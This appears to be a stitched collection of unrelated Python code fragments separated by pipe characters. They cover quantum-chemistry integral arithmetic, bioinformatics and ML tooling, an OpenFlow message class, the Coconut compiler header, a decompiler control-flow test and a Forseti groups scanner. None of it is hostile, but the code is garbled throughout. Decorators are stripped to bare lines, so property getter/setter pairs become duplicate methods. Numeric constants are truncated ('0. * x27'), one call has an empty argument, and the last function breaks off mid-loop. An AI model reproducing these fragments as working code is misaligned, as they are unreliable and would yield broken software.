x10 = (3.0 * x9)
x11 = (2.0 * x3)
x12 = ((- x2) - R[0])
x13 = (x12 * x7)
x14 = (x10 + (x11 * x13))
x15 = (2.0 * x0)
x16 = (x3 * x7)
x17 = (x0 * (x13 + x16))
x18 = ((x12 * x16) + x9)
x19 = (x18 * x3)
x20 = ((x12 ** 2) * x7)
x21 = (x0 * (x14 + x20))
x22 = (x12 * x18)
x23 = (x17 + x22)
x24 = (x23 * x3)
x25 = (x21 + x24)
x26 = (((2.0 * x0) * (((2.0 * x17) + x19) + x22)) + (x25 * x3))
x27 = (da * db)
x28 = (0. * x27)
x29 = numpy.exp(((- x4) * ((A[1] - B[1]) ** 2)))
x30 = numpy.exp(((- x4) * ((A[2] - B[2]) ** 2)))
x31 = ((3. * x1) * x30)
x32 = (x29 * x31)
x33 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
x34 = ((- x33) - A[1])
x35 = (0. * x27)
x36 = (x34 * x35)
x37 = (x26 * x32)
x38 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
x39 = ((- x38) - A[2])
x40 = (x35 * x39)
x41 = (x30 * x6)
x42 = (x29 * x6)
x43 = ((x34 ** 2) * x42)
x44 = (x0 * x42)
x45 = (x43 + x44)
x46 = (0. * x27)
x47 = (x45 * x46)
x48 = 1.
x49 = ((x39 * x46) * x48)
x50 = ((x39 ** 2) * x41)
x51 = (x0 * x41)
x52 = (x50 + x51)
x53 = (x46 * x52)
x54 = (x34 * x42)
x55 = ((x15 * x54) + (x34 * x45))
x56 = (x23 * x35)
x57 = (x39 * x41)
x58 = (x23 * x48)
x59 = ((x15 * x57) + (x39 * x52))
x60 = (3.0 * x44)
x61 = ((x0 * ((3.0 * x43) + x60)) + (x34 * x55))
x62 = (x20 + x9)
x63 = (x28 * x62)
x64 = (x35 * x62)
x65 = (3.0 * x51)
x66 = ((x0 * ((3.0 * x50) + x65)) + (x39 * x59))
x67 = (x8 + x9)
x68 = ((x15 * x16) + (x3 * x67))
x69 = ((x0 * (x10 + (3.0 * x8))) + (x3 * x68))
x70 = ((- x33) - R[1])
x71 = (x42 * (x70 ** 2))
x72 = (x44 + x71)
x73 = (x28 * x72)
x74 = (x42 * x70)
x75 = (x0 * (x54 + x74))
x76 = (x44 + (x54 * x70))
x77 = (x70 * x76)
x78 = (x75 + x77)
x79 = (x35 * x78)
x80 = (x35 * x72)
x81 = (2.0 * x34)
x82 = (x60 + (x74 * x81))
x83 = (x0 * (x71 + x82))
x84 = (x34 * x78)
x85 = (x83 + x84)
x86 = (x46 * x67)
x87 = (x48 * x78)
x88 = (x34 * x76)
x89 = (((2.0 * x0) * (((2.0 * x75) + x77) + x88)) + (x34 * x85))
x90 = (x31 * x89)
x91 = (x3 * x5)
x92 = (x35 * x91)
x93 = (x28 * x5)
x94 = ((- x38) - R[2])
x95 = (x41 * (x94 ** 2))
x96 = (x51 + x95)
x97 = (x28 * x96)
x98 = (x35 * x96)
x99 = (x41 * x94)
x100 = (x0 * (x57 + x99))
x101 = (x51 + (x57 * x94))
x102 = (x101 * x94)
x103 = (x100 + x102)
x104 = (x103 * x35)
x105 = (x103 * x48)
x106 = (2.0 * x39)
x107 = ((x106 * x99) + x65)
x108 = (x0 * (x107 + x95))
x109 = (x103 * x39)
x110 = (x108 + x109)
x111 = ((3. * x1) * x29)
x112 = (x101 * x39)
x113 = (((2.0 * x0) * (((2.0 * x100) + x102) + x112)) + (x110 * x39))
x114 = (x111 * x113)
result[(0, 0, 0)] = numpy.sum(((x28 * x32) * ((x0 * ((((x11 * (x17 + x19)) + (x15 * (x14 + x8))) + (3.0 * x21)) + (3.0 * x24))) + (x26 * x3))))
result[(0, 1, 0)] = numpy.sum((x36 * x37))
result[(0, 2, 0)] = numpy.sum((x37 * x40))
result[(0, 3, 0)] = numpy.sum(((x25 * x41) * x47))
result[(0, 4, 0)] = numpy.sum((((x25 * x32) * x34) * x49))
result[(0, 5, 0)] = numpy.sum(((x25 * x42) * x53))
result[(0, 6, 0)] = numpy.sum(((x41 * x55) * x56))
result[(0, 7, 0)] = numpy.sum(((x47 * x57) * x58))
result[(0, 8, 0)] = numpy.sum(((x53 * x54) * x58))
result[(0, 9, 0)] = numpy.sum(((x42 * x56) * x59))
result[(0, 10, 0)] = numpy.sum(((x41 * x61) * x63))
result[(0, 11, 0)] = numpy.sum(((x55 * x57) * x64))
result[(0, 12, 0)] = numpy.sum(((x45 * x53) * x62))
result[(0, 13, 0)] = numpy.sum(((x54 * x59) * x64))
result[(0, 14, 0)] = numpy.sum(((x42 * x63) * x66))
result[(1, 0, 0)] = numpy.sum(((x41 * x69) * x73))
result[(1, 1, 0)] = numpy.sum(((x41 * x68) * x79))
result[(1, 2, 0)] = numpy.sum(((x57 * x68) * x80))
result[(1, 3, 0)] = numpy.sum(((x41 * x85) * x86))
result[(1, 4, 0)] = numpy.sum(((x57 * x86) * x87))
result[(1, 5, 0)] = numpy.sum(((x53 * x67) * x72))
result[(1, 6, 0)] = numpy.sum((x90 * x92))
result[(1, 7, 0)] = numpy.sum((((x31 * x49) * x85) * x91))
result[(1, 8, 0)] = numpy.sum(((x16 * x53) * x87))
result[(1, 9, 0)] = numpy.sum(((x16 * x59) * x80))
result[(1, 10, 0)] = numpy.sum(((x31 * x93) * ((x0 * ((((x15 * (x43 + x82)) + (x81 * (x75 + x88))) + (3.0 * x83)) + (3.0 * x84))) + (x34 * x89))))
result[(1, 11, 0)] = numpy.sum(((x40 * x5) * x90))
result[(1, 12, 0)] = numpy.sum(((x53 * x7) * x85))
result[(1, 13, 0)] = numpy.sum(((x59 * x7) * x79))
result[(1, 14, 0)] = numpy.sum(((x66 * x7) * x73))
result[(2, 0, 0)] = numpy.sum(((x42 * x69) * x97))
result[(2, 1, 0)] = numpy.sum(((x54 * x68) * x98))
result[(2, 2, 0)] = numpy.sum(((x104 * x42) * x68))
result[(2, 3, 0)] = numpy.sum(((x47 * x67) * x96))
result[(2, 4, 0)] = numpy.sum(((x105 * x54) * x86))
result[(2, 5, 0)] = numpy.sum(((x110 * x42) * x86))
result[(2, 6, 0)] = numpy.sum(((x16 * x55) * x98))
result[(2, 7, 0)] = numpy.sum(((x105 * x16) * x47))
result[(2, 8, 0)] = numpy.sum((((((x110 * x111) * x34) * x46) * x48) * x91))
result[(2, 9, 0)] = numpy.sum((x114 * x92))
result[(2, 10, 0)] = numpy.sum(((x61 * x7) * x97))
result[(2, 11, 0)] = numpy.sum(((x104 * x55) * x7))
result[(2, 12, 0)] = numpy.sum(((x110 * x47) * x7))
result[(2, 13, 0)] = numpy.sum(((x114 * x36) * x5))
result[(2, 14, 0)] = numpy.sum(((x111 * x93) * ((x0 * ((((x106 * (x100 + x112)) + (3.0 * x108)) + (3.0 * x109)) + (x15 * (x107 + x50)))) + (x113 * x39))))
return result |
def _cmd_antitarget(args):
targets = tabio.read_auto(args.targets)
access = (tabio.read_auto(args.access) if args.access else None)
out_arr = antitarget.do_antitarget(targets, access, args.avg_size, args.min_size)
if (not args.output):
(base, ext) = args.interval.rsplit('.', 1)
args.output = ((base + '.antitarget.') + ext)
tabio.write(out_arr, args.output, 'bed4') |
def build_d2go_model(cfg: CfgNode) -> D2GoModelBuildResult:
model = build_meta_arch(cfg)
modeling_hooks: List[mh.ModelingHook] = []
if hasattr(cfg.MODEL, 'MODELING_HOOKS'):
hook_names = cfg.MODEL.MODELING_HOOKS
(model, modeling_hooks) = mh.build_and_apply_modeling_hooks(model, cfg, hook_names)
return D2GoModelBuildResult(model=model, modeling_hooks=modeling_hooks) |
def get_bucket():
try:
session = boto3.Session()
s3 = session.resource('s3')
bucket = s3.Bucket(env.get_credential('AWS_PUBLIC_BUCKET'))
except Exception as err:
logging.error('An error occurred trying to connect to s3. Please disregard if running locally.{0}'.format(err))
return
return bucket |
class BaseBenchmark(abc.ABC):
def __init__(self, job_control: proto_control.JobControl, benchmark_name: str) -> None:
if (job_control is None):
raise BenchmarkError('No control object received')
self._docker_image = docker_image.DockerImage()
self._control = job_control
self._benchmark_name = benchmark_name
self._mode_remote = self._control.remote
self._build_envoy = False
self._build_nighthawk = False
log.debug(f'Running benchmark: %s {self._benchmark_name} [{self}]', ('Remote' if self._mode_remote else 'Local'))
def get_name(self) -> str:
return self._benchmark_name
def get_image(self) -> str:
return self._control.images.envoy_image
def _verify_sources(self, images: proto_image.DockerImages) -> None:
source = self.get_source()
if (not source):
raise BenchmarkError('No source configuration specified')
can_build_envoy = False
can_build_nighthawk = False
for source_def in source:
if (source_def.identity == source_def.SRCID_UNSPECIFIED):
raise BenchmarkError('No source identity specified')
if ((not images.envoy_image) and (source_def.identity == source_def.SRCID_ENVOY)):
can_build_envoy = True
if (((not images.nighthawk_benchmark_image) or (not images.nighthawk_binary_image)) and (source_def.identity == source_def.SRCID_NIGHTHAWK)):
can_build_nighthawk = True
if ((not images.envoy_image) and (not can_build_envoy)):
raise BenchmarkError('No source specified to build Envoy image')
if (((not images.nighthawk_benchmark_image) or (not images.nighthawk_binary_image)) and (not can_build_nighthawk)):
raise BenchmarkError('No source specified to build NightHawk image')
def is_remote(self) -> bool:
return self._mode_remote
def get_images(self) -> proto_image.DockerImages:
return self._control.images
def get_source(self) -> List[proto_source.SourceRepository]:
return self._control.source
def run_image(self, image_name: str, run_parameters: docker_image.DockerRunParameters) -> Union[(bytearray, None)]:
return self._docker_image.run_image(image_name, run_parameters)
def execute_benchmark(self) -> None: |
class SystemVerilogPackage(Generator, Jinja2):
def __init__(self, rmap=None, path='regs_pkg.sv', prefix='CSR', **args):
super().__init__(rmap, **args)
self.path = path
self.prefix = prefix
def generate(self):
self.validate()
j2_template = 'sv_package.j2'
j2_vars = {}
j2_vars['corsair_ver'] = __version__
j2_vars['rmap'] = self.rmap
j2_vars['prefix'] = self.prefix.upper()
j2_vars['file_name'] = utils.get_file_name(self.path)
j2_vars['config'] = config.globcfg
self.render_to_file(j2_template, j2_vars, self.path) |
def arithmetic_graph_fixer(skip: Set[str]) -> GraphFixer:
typer = LatticeTyper()
def _arithmetic_graph_fixer(bmg: BMGraphBuilder) -> GraphFixerResult:
node_fixers = [addition_fixer(bmg, typer), bool_arithmetic_fixer(bmg, typer), bool_comparison_fixer(bmg, typer), log1mexp_fixer(bmg, typer), logsumexp_fixer(bmg), multiary_addition_fixer(bmg), multiary_multiplication_fixer(bmg), neg_neg_fixer(bmg), negative_real_multiplication_fixer(bmg, typer), nested_if_same_cond_fixer(bmg), nested_matrix_scale_fixer(bmg), sum_fixer(bmg, typer), trivial_matmul_fixer(bmg, typer), unsupported_node_fixer(bmg, typer), identity_transpose_fixer(bmg, typer)]
node_fixers = [nf for nf in node_fixers if (nf.__name__ not in skip)]
node_fixer = node_fixer_first_match(node_fixers)
arith = ancestors_first_graph_fixer(typer, node_fixer)
return fixpoint_graph_fixer(arith)(bmg)
return _arithmetic_graph_fixer |
(IResourceProtocol)
class FileResourceProtocol(HasTraits):
def file(self, address):
try:
f = open(address, 'rb')
except IOError as e:
if (e.errno == errno.ENOENT):
raise NoSuchResourceError(address)
else:
raise
return f |
def TrashMenuItem(name, after, get_tracks_func=generic_get_tracks_func, trash_tracks_func=generic_trash_tracks_func, delete_tracks_func=generic_delete_tracks_func):
return menu.simple_menu_item(name, after, _('_Move to Trash'), 'user-trash', _on_trash_tracks, callback_args=[get_tracks_func, trash_tracks_func, delete_tracks_func]) |
_traitsui
class TestConfigureTraits(unittest.TestCase):
def setUp(self):
self.toolkit = traitsui.api.toolkit()
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
del self.tmpdir
del self.toolkit
def test_simple_call(self):
model = Model()
with mock.patch.object(self.toolkit, 'view_application') as mock_view:
model.configure_traits()
self.assertEqual(mock_view.call_count, 1)
def test_filename_but_no_file(self):
model = Model(count=37)
filename = os.path.join(self.tmpdir, 'nonexistent.pkl')
self.assertFalse(os.path.exists(filename))
with mock.patch.object(self.toolkit, 'view_application'):
with self.assertWarns(DeprecationWarning):
model.configure_traits(filename=filename)
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as pickled_object:
unpickled = pickle.load(pickled_object)
self.assertIsInstance(unpickled, Model)
self.assertEqual(unpickled.count, model.count)
def test_pickle_protocol(self):
model = Model(count=37)
filename = os.path.join(self.tmpdir, 'nonexistent.pkl')
self.assertFalse(os.path.exists(filename))
with mock.patch.object(self.toolkit, 'view_application'):
with self.assertWarns(DeprecationWarning):
model.configure_traits(filename=filename)
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as pickled_object_file:
pickled_object = pickled_object_file.read()
(opcode, arg, _) = next(pickletools.genops(pickled_object))
self.assertEqual(opcode.name, 'PROTO')
self.assertEqual(arg, 3)
def test_filename_with_existing_file(self):
stored_model = Model(count=52)
filename = os.path.join(self.tmpdir, 'model.pkl')
with open(filename, 'wb') as pickled_object:
pickle.dump(stored_model, pickled_object)
model = Model(count=19)
with mock.patch.object(self.toolkit, 'view_application'):
with self.assertWarns(DeprecationWarning):
model.configure_traits(filename=filename)
self.assertEqual(model.count, 52)
def test_filename_with_invalid_existing_file(self):
filename = os.path.join(self.tmpdir, 'model.pkl')
with open(filename, 'wb') as pickled_object:
pickled_object.write(b'this is not a valid pickle')
model = Model(count=19)
with mock.patch.object(self.toolkit, 'view_application'):
with self.assertRaises(pickle.PickleError):
with self.assertWarns(DeprecationWarning):
model.configure_traits(filename=filename)
def test_filename_with_existing_file_stores_updated_model(self):
stored_model = Model(count=52)
filename = os.path.join(self.tmpdir, 'model.pkl')
with open(filename, 'wb') as pickled_object:
pickle.dump(stored_model, pickled_object)
def modify_model(*args, **kwargs):
model.count = 23
return mock.DEFAULT
model = Model(count=19)
with mock.patch.object(self.toolkit, 'view_application') as mock_view:
mock_view.side_effect = modify_model
with self.assertWarns(DeprecationWarning):
model.configure_traits(filename=filename)
self.assertEqual(model.count, 23)
with open(filename, 'rb') as pickled_object:
unpickled = pickle.load(pickled_object)
self.assertIsInstance(unpickled, Model)
self.assertEqual(unpickled.count, model.count)
def test_edit_when_false(self):
model = Model()
with mock.patch.object(self.toolkit, 'view_application') as mock_view:
mock_view.return_value = True
with self.assertWarns(DeprecationWarning):
model.configure_traits(edit=False)
mock_view.assert_not_called()
def test_edit_when_true(self):
model = Model()
with mock.patch.object(self.toolkit, 'view_application') as mock_view:
mock_view.return_value = True
with self.assertWarns(DeprecationWarning):
model.configure_traits(edit=True)
mock_view.assert_called_once()
def test_edit_not_given(self):
model = Model()
with mock.patch.object(self.toolkit, 'view_application') as mock_view:
mock_view.return_value = True
with warnings.catch_warnings(record=True) as captured_warnings:
warnings.simplefilter('always', DeprecationWarning)
model.configure_traits()
mock_view.assert_called_once()
all_warnings = ''.join((str(warning.message) for warning in captured_warnings))
self.assertNotIn('edit argument', all_warnings) |
class DbMock(CommonDatabaseMock):
def generic_search(search_dict: dict, skip: int=0, limit: int=0, only_fo_parent_firmware: bool=False, inverted: bool=False, as_meta: bool=False):
result = []
if ((TEST_FW_2.uid in str(search_dict)) or (search_dict == {})):
result.append(TEST_FW_2.uid)
if (TEST_TEXT_FILE.uid in str(search_dict)):
if (not only_fo_parent_firmware):
result.append(TEST_TEXT_FILE.uid)
elif (TEST_FW_2.uid not in result):
result.append(TEST_FW_2.uid)
if as_meta:
return [MetaEntry(uid, 'hid', {}, 0) for uid in result]
return result |
def shells_with_basis(atoms: Tuple, coords, basis=None, name=None, shells_cls=None, min_coeff=1e-08, **kwargs):
assert ((basis is not None) or (name is not None))
if (shells_cls is None):
shells_cls = Shells
if (name is not None):
basis = basis_from_json(name)
coords3d = np.reshape(coords, (len(atoms), 3))
shells = list()
for (i, (atom, c3d)) in enumerate(zip(atoms, coords3d)):
Zs = str(ATOMIC_NUMBERS[atom.lower()])
basis_shells = basis[Zs]['electron_shells']
for bshell in basis_shells:
L = bshell['angular_momentum']
if (len(L) == 1):
L = it.cycle(L)
exponents = np.array(bshell['exponents'], dtype=float)
for (L, coeffs) in zip(L, bshell['coefficients']):
coeffs = np.array(coeffs, dtype=float)
valid = (np.abs(coeffs) >= min_coeff)
shell = Shell(L=L, center=c3d, coeffs=coeffs[valid], exps=exponents[valid], atomic_num=Zs, center_ind=i)
shells.append(shell)
shells = shells_cls(shells, **kwargs)
return shells |
def calc():
gs_kwargs = {'keywords': 'b3lyp def2-svp', 'pal': 6, 'calc_number': 0}
calc1 = ORCA5(**gs_kwargs)
es_kwargs = gs_kwargs.copy()
es_kwargs.update({'numfreq': True, 'blocks': '%tddft iroot 1 nroots 1 end', 'calc_number': 1})
calc2 = ORCA5(**es_kwargs)
calc = ConicalIntersection(calc1, calc2)
return calc |
def test_generate_gpu_of_a_simple_model(create_test_data, store_local_session, create_pymel, create_maya_env):
data = create_test_data
pm = create_pymel
maya_env = create_maya_env
gen = RepresentationGenerator(version=data['building1_yapi_model_main_v003'])
gen.generate_gpu()
r = Representation(version=data['building1_yapi_model_main_v003'])
v = r.find('GPU')
maya_env.open(v, force=True)
node = pm.PyNode('duvarlar')
assert (node is not None)
assert (node.getShape().type() == 'gpuCache') |
class meter_config_stats_reply(stats_reply):
version = 6
type = 19
stats_type = 10
def __init__(self, xid=None, flags=None, entries=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (entries != None):
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = meter_config_stats_reply()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 19)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 10)
obj.flags = reader.read('!H')[0]
reader.skip(4)
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.meter_config.unpack)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.entries != other.entries):
return False
return True
def pretty_print(self, q):
q.text('meter_config_stats_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REPLY_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('entries = ')
q.pp(self.entries)
q.breakable()
q.text('}') |
class OptionSeriesWindbarbSonificationDefaultspeechoptionsMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
()
def getheader(which, use_hash, target, no_tco, strict, no_wrap):
internal_assert((which.startswith('package') or (which in ('none', 'initial', '__coconut__', 'sys', 'code', 'file'))), 'invalid header type', which)
if (which == 'none'):
return ''
target_info = get_target_info(target)
header_info = tuple_str_of((VERSION, target, strict), add_quotes=True)
format_dict = process_header_args(which, use_hash, target, no_tco, strict, no_wrap)
if ((which == 'initial') or (which == '__coconut__')):
header = '#!/usr/bin/env python{target_major}\n# -*- coding: {default_encoding} -*-\n{hash_line}{typing_line}\n# Compiled with Coconut version {VERSION_STR}\n\n{module_docstring}'.format(**format_dict)
elif (use_hash is not None):
raise CoconutInternalException('can only add a hash to an initial or __coconut__ header, not', which)
else:
header = ''
if (which == 'initial'):
return header
header += section('Coconut Header', newline_before=False)
if (not target.startswith('3')):
header += 'from __future__ import print_function, absolute_import, unicode_literals, division\n'
elif (target_info >= (3, 13)):
header += 'from __future__ import generator_stop\n'
elif (target_info >= (3, 7)):
if no_wrap:
header += 'from __future__ import generator_stop\n'
else:
header += 'from __future__ import generator_stop, annotations\n'
elif (target_info >= (3, 5)):
header += 'from __future__ import generator_stop\n'
header += 'import sys as _coconut_sys\nimport os as _coconut_os\n'
if (which.startswith('package') or (which == '__coconut__')):
header += (('_coconut_header_info = ' + header_info) + '\n')
levels_up = None
if which.startswith('package'):
levels_up = int(assert_remove_prefix(which, 'package:'))
coconut_file_dir = '_coconut_os.path.dirname(_coconut_os.path.abspath(__file__))'
for _ in range(levels_up):
coconut_file_dir = (('_coconut_os.path.dirname(' + coconut_file_dir) + ')')
header += prepare('\n_coconut_cached__coconut__ = _coconut_sys.modules.get({__coconut__})\n_coconut_file_dir = {coconut_file_dir}\n_coconut_pop_path = False\nif _coconut_cached__coconut__ is None or getattr(_coconut_cached__coconut__, "_coconut_header_info", None) != _coconut_header_info and _coconut_os.path.dirname(_coconut_cached__coconut__.__file__ or "") != _coconut_file_dir:\n if _coconut_cached__coconut__ is not None:\n _coconut_sys.modules[{_coconut_cached__coconut__}] = _coconut_cached__coconut__\n del _coconut_sys.modules[{__coconut__}]\n _coconut_sys.path.insert(0, _coconut_file_dir)\n _coconut_pop_path = True\n _coconut_module_name = _coconut_os.path.splitext(_coconut_os.path.basename(_coconut_file_dir))[0]\n if _coconut_module_name and _coconut_module_name[0].isalpha() and all(c.isalpha() or c.isdigit() for c in _coconut_module_name) and "__init__.py" in _coconut_os.listdir(_coconut_file_dir):\n _coconut_full_module_name = str(_coconut_module_name + ".__coconut__")\n import __coconut__ as _coconut__coconut__\n _coconut__coconut__.__name__ = _coconut_full_module_name\n for _coconut_v in vars(_coconut__coconut__).values():\n if getattr(_coconut_v, "__module__", None) == {__coconut__}:\n try:\n _coconut_v.__module__ = _coconut_full_module_name\n except AttributeError:\n _coconut_v_type = type(_coconut_v)\n if getattr(_coconut_v_type, "__module__", None) == {__coconut__}:\n _coconut_v_type.__module__ = _coconut_full_module_name\n _coconut_sys.modules[_coconut_full_module_name] = _coconut__coconut__\nfrom __coconut__ import *\nfrom __coconut__ import {underscore_imports}\nif _coconut_pop_path:\n _coconut_sys.path.pop(0)\n ', newline=True).format(coconut_file_dir=coconut_file_dir, **format_dict)
if (which == 'sys'):
header += 'from coconut.__coconut__ import *\nfrom coconut.__coconut__ import {underscore_imports}\n'.format(**format_dict)
header += prepare('\ntry:\n __file__ = _coconut_os.path.abspath(__file__) if __file__ else __file__\nexcept NameError:\n pass\nelse:\n if __file__ and {coconut_cache_dir} in __file__:\n _coconut_file_comps = []\n while __file__:\n __file__, _coconut_file_comp = _coconut_os.path.split(__file__)\n if not _coconut_file_comp:\n _coconut_file_comps.append(__file__)\n break\n if _coconut_file_comp != {coconut_cache_dir}:\n _coconut_file_comps.append(_coconut_file_comp)\n __file__ = _coconut_os.path.join(*reversed(_coconut_file_comps))\n ', newline=True).format(**format_dict)
if ((which == 'sys') or which.startswith('package')):
return (header + section('Compiled Coconut'))
internal_assert((which in ('__coconut__', 'code', 'file')), 'wrong header type', which)
header += prepare('\n_coconut_cached__coconut__ = _coconut_sys.modules.get({_coconut_cached__coconut__}, _coconut_sys.modules.get({__coconut__}))\n ', newline=True).format(**format_dict)
header += _get_root_header(('311' if (target_info >= (3, 11)) else ('39' if (target_info >= (3, 9)) else ('37' if (target_info >= (3, 7)) else ('3' if target.startswith('3') else ('27' if (target_info >= (2, 7)) else ('2' if target.startswith('2') else 'universal')))))))
header += get_template('header').format(**format_dict)
if (which == 'file'):
header += section('Compiled Coconut')
return header |
class BanOrmModel(OrmModelBase):
__tablename__ = 'ban'
id = Column(Integer(), primary_key=True)
ip4 = Column(BigInteger(), nullable=False, index=True)
ip4_end = Column(BigInteger(), nullable=True, index=True)
reason = Column(String(), nullable=False)
date = Column(BigInteger(), nullable=False)
length = Column(BigInteger, nullable=False)
board = Column(String(), nullable=True, index=True)
post = Column(Integer(), ForeignKey('post.id'), nullable=True)
moderator_id = Column(Integer(), ForeignKey('moderator.id'), nullable=True, index=True) |
def _switch_no_empty_fallthrough(task) -> Tuple[(Variable, List[BasicBlock])]:
var_1 = Variable('var_1', Pointer(Integer(32, True), 32), None, False, Variable('var_28', Pointer(Integer(32, True), 32), 1, False, None))
var_0 = Variable('var_0', Integer(32, True), None, True, Variable('var_10', Integer(32, True), 0, True, None))
task.graph.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), print_call('Enter a digit (0-9): ', 1)), Assignment(var_1, UnaryOperation(OperationType.address, [var_0], Pointer(Integer(32, True), 32), None, False)), Assignment(ListOperation([]), scanf_call(var_1, , 2)), Branch(Condition(OperationType.greater_us, [var_0, Constant(9, Integer(32, True))], CustomType('bool', 1)))]), BasicBlock(1, [Assignment(ListOperation([]), print_call('Not a digit ', 3))]), BasicBlock(2, [IndirectBranch(var_0)]), BasicBlock(3, [Return(ListOperation([Constant(0, Integer(32, True))]))]), BasicBlock(4, [Assignment(ListOperation([]), putchar_call(48, 4))]), BasicBlock(5, [Assignment(ListOperation([]), putchar_call(49, 6))]), BasicBlock(6, [Assignment(ListOperation([]), putchar_call(50, 7))]), BasicBlock(7, [Assignment(ListOperation([]), putchar_call(51, 9))]), BasicBlock(8, [Assignment(ListOperation([]), putchar_call(52, 11))]), BasicBlock(9, [Assignment(ListOperation([]), putchar_call(53, 12))]), BasicBlock(10, [Assignment(ListOperation([]), putchar_call(54, 14))]), BasicBlock(11, [Assignment(ListOperation([]), putchar_call(55, 16))]), BasicBlock(12, [Assignment(ListOperation([]), putchar_call(56, 18))]), BasicBlock(13, [Assignment(ListOperation([]), putchar_call(57, 20))])]))
task.graph.add_edges_from([TrueCase(vertices[0], vertices[1]), FalseCase(vertices[0], vertices[2]), UnconditionalEdge(vertices[1], vertices[3]), SwitchCase(vertices[2], vertices[4], [Constant(0, Integer(32))]), SwitchCase(vertices[2], vertices[5], [Constant(1, Integer(32))]), SwitchCase(vertices[2], vertices[6], [Constant(2, Integer(32))]), SwitchCase(vertices[2], vertices[7], [Constant(3, Integer(32))]), SwitchCase(vertices[2], vertices[8], [Constant(4, Integer(32))]), SwitchCase(vertices[2], vertices[9], [Constant(5, Integer(32))]), SwitchCase(vertices[2], vertices[10], [Constant(6, Integer(32))]), SwitchCase(vertices[2], vertices[11], [Constant(7, Integer(32))]), SwitchCase(vertices[2], vertices[12], [Constant(8, Integer(32))]), SwitchCase(vertices[2], vertices[13], [Constant(9, Integer(32))]), UnconditionalEdge(vertices[4], vertices[5]), UnconditionalEdge(vertices[5], vertices[3]), UnconditionalEdge(vertices[6], vertices[7]), UnconditionalEdge(vertices[7], vertices[8]), UnconditionalEdge(vertices[8], vertices[3]), UnconditionalEdge(vertices[9], vertices[10]), UnconditionalEdge(vertices[10], vertices[11]), UnconditionalEdge(vertices[11], vertices[12]), UnconditionalEdge(vertices[12], vertices[13]), UnconditionalEdge(vertices[13], vertices[3])])
return (var_0, vertices) |
def _string_to_bool(s: (str | None)):
if (s is None):
return None
s = s.lower()
if (s in ['y', 'yes', 't', 'true']):
return True
if (s in ['n', 'no', 'f', 'false']):
return False
raise Exception(f"Invalid argument '{s}', should be a bool value: y/yes/n/no/t/true/f/false.") |
class GroupsScanner(base_scanner.BaseScanner):
def _flatten_violations(violations):
for violation in violations:
violation_data = {'violated_rule_names': violation.violated_rule_names, 'member_email': violation.member_email, 'member_id': violation.member_id, 'member_status': violation.member_status, 'member_type': violation.member_type, 'parent_email': violation.parent.member_email, 'parent_id': violation.parent.member_id, 'parent_status': violation.parent.member_status, 'parent_resource_type': violation.parent.member_type}
full_name = ((violation.parent.member_id + ':') + violation.member_id)
(yield {'resource_id': violation.member_email, 'resource_name': violation.member_email, 'resource_type': 'group_member', 'full_name': full_name, 'rule_index': None, 'rule_name': violation.violated_rule_names, 'violation_type': 'GROUP_VIOLATION', 'violation_data': violation_data, 'resource_data': violation.resource_data})
def _output_results(self, all_violations):
all_violations = self._flatten_violations(all_violations)
self._output_results_to_db(all_violations)
def _find_violations(root):
all_violations = []
for node in anytree.iterators.PreOrderIter(root):
if (node.member_email == MY_CUSTOMER):
continue
if (not node.member_email):
continue
if (not node.rules):
continue
node.violated_rule_names = []
whitelist_rule_statuses = []
for rule in node.rules:
condition_statuses = []
if (rule.get('mode') == 'whitelist'):
for condition in rule.get('conditions'):
if (condition.get('member_email') in node.member_email):
condition_statuses.append(True)
else:
condition_statuses.append(False)
if any(condition_statuses):
whitelist_rule_statuses.append(True)
else:
whitelist_rule_statuses.append(False)
node.violated_rule_names.append(rule.get('name'))
elif (rule.get('mode') == 'blacklist'):
pass
elif (rule.get('mode') == 'required'):
pass
else:
pass
if (not any(whitelist_rule_statuses)):
all_violations.append(node)
return all_violations
def _apply_one_rule(starting_node, rule):
for node in anytree.iterators.PreOrderIter(starting_node):
node.rules.append(rule)
return starting_node
def _apply_all_rules(self, starting_node, group_rules):
for rule in group_rules:
if (rule.get('group_email') == MY_CUSTOMER):
starting_node = self._apply_one_rule(starting_node, rule)
else:
for node in anytree.iterators.PreOrderIter(starting_node):
if (node.member_email == rule.get('group_email')):
self._apply_one_rule(node, rule)
break
return starting_node
def _get_recursive_members(self, starting_node):
model_manager = self.service_config.model_manager
(scoped_session, data_access) = model_manager.get(self.model_name)
with scoped_session as session:
members = data_access.expand_members(session, [starting_node.member_id])
for member in members:
